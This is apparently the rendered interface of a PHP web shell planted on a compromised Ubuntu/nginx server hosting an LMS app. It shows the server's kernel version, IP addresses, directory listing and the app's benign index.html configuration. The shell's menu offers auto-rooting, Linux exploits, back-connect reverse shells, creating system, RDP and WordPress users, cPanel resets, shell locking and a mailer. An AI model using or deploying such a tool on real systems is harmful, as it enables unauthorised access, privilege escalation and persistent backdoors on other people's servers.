Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
containers
[ DIR ]
drwxr-xr-x
edusewa
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
service
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
translations
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.htaccess
1.75
KB
-rw-r--r--
.nginx.conf
3.21
KB
-rw-r--r--
app.tsx
4.15
KB
-rw-r--r--
configureStore.ts
4.25
KB
-rw-r--r--
global-styles.ts
658
B
-rw-r--r--
globals.d.tsx
401
B
-rw-r--r--
i18n.ts
1.26
KB
-rw-r--r--
index.html
6.25
KB
-rw-r--r--
locales.ts
95
B
-rw-r--r--
reducers.ts
3.76
KB
-rw-r--r--
saga.tsx
2.72
KB
-rw-r--r--
utils.d.ts
74
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <!-- The first thing in any HTML file should be the charset --> <meta charset="utf-8" /> <!-- Make the page mobile compatible --> <meta name="viewport" content="width=device-width, initial-scale=1" /> <!-- Allow installing the app to the homescreen --> <meta name="mobile-web-app-capable" content="yes" /> <link rel="icon" href="/favicon.ico" /> <title>LMS</title> <script type="text/javascript"> // eslint-disable-next-line var config = { loginEnabled: false, developmentPort: 3443, productionPort: 443, /** * Supported browsers version * in bowser satisfy format. * See more: * https://www.npmjs.com/package/bowser#filtering-browsers * Otherwise you got a unsupported browser page */ supportedBrowsers: { windows: { 'internet explorer': '>12', 'microsoft edge': '>18', }, safari: '>12', firefox: '>=60', chrome: '>=74', chromium: '>=74', opera: '>=62', 'samsung internet for android': '>=11.1.1.52', }, /** * Resolutions: * * low ~ 320x240 * medium ~ 640x480 * high ~ 1280x720 * veryhigh ~ 1920x1080 * ultra ~ 3840x2560 * **/ /** * Frame rates: * * 1, 5, 10, 15, 20, 25, 30 * **/ defaultResolution: 'medium', defaultFrameRate: 15, defaultScreenResolution: 'veryhigh', defaultScreenSharingFrameRate: 5, // Enable or disable simulcast for webcam video simulcast: true, // Enable or disable simulcast for screen sharing video simulcastSharing: false, // Simulcast encoding layers and levels simulcastEncodings: [ { scaleResolutionDownBy: 4 }, { scaleResolutionDownBy: 2 }, { scaleResolutionDownBy: 1 }, ], /** * Alternative simulcast setting: * [ * { maxBitRate: 50000 }, * { maxBitRate: 1000000 }, * { maxBitRate: 4800000 } *], **/ /** * White listing browsers that support audio output device selection. * It is not yet fully implemented in Firefox. * See: https://bugzilla.mozilla.org/show_bug.cgi?id=1498512 */ audioOutputSupportedBrowsers: ['chrome', 'opera'], // Socket.io request timeout requestTimeout: 20000, requestRetries: 3, transportOptions: { tcp: true, }, defaultAudio: { sampleRate: 48000, channelCount: 1, volume: 1.0, autoGainControl: true, echoCancellation: true, noiseSuppression: true, voiceActivityMute: false, sampleSize: 16, }, /** * Set max number participants in one room that join * unmuted. Next participant will join automatically muted * Default value is 4 * * Set it to 0 to auto mute all, * Set it to negative (-1) to never automatically auto mute * but use it with caution * full mesh audio strongly decrease room capacity! */ autoMuteThreshold: 4, background: 'images/background.jpg', defaultLayout: 'spotlight', // democratic, filmstrip, spotlight // If true, will show media control buttons in separate // control bar, not in the ME container. buttonControlBar: true, // If false, will push videos away to make room for side // drawer. If true, will overlay side drawer over videos drawerOverlayed: false, // Position of notifications notificationPosition: 'right', // Timeout for autohiding topbar and button control bar hideTimeout: 3000, // max number of participant that will be visible in // as speaker lastN: 4, mobileLastN: 1, // Highest number of lastN the user can select manually in // userinteface maxLastN: 5, // If truthy, users can NOT change number of speakers visible lockLastN: false, // Add file and uncomment for adding logo to appbar // logo : 'images/logo.svg', title: 'LMS', // Service & Support URL // if not set then not displayed on the about modals supportUrl: 'https://support.example.com', // Privacy and dataprotection URL or path // by default privacy/privacy.html // that is a placeholder for your policies // // but an external url could be also used here privacyUrl: 'privacy/privacy.html', theme: { palette: { primary: { main: '#313131', }, }, overrides: { MuiAppBar: { colorPrimary: { backgroundColor: '#313131', }, }, MuiFab: { primary: { backgroundColor: '#5F9B2D', '&:hover': { backgroundColor: '#518029', }, }, }, MuiBadge: { colorPrimary: { backgroundColor: '#5F9B2D', '&:hover': { backgroundColor: '#518029', }, }, }, }, typography: { useNextVariants: true, }, }, }; </script> </head> <body> <!-- Display a message if JS has been disabled on the browser. --> <noscript >If you're seeing this message, that means <strong>JavaScript has been disabled on your browser</strong>, please <strong>enable JS</strong> to make this app work.</noscript > <!-- The app hooks into this div --> <div id="app"></div> <!-- A lot of magic happens in this file. HtmlWebpackPlugin automatically injects all assets (e.g. bundle.js, main.css) with the correct HTML tags, which is why they are missing in this file. Don't add any assets here! (Check out webpack.dev.babel.js and webpack.prod.babel.js if you want to know more) --> </body> </html>
Close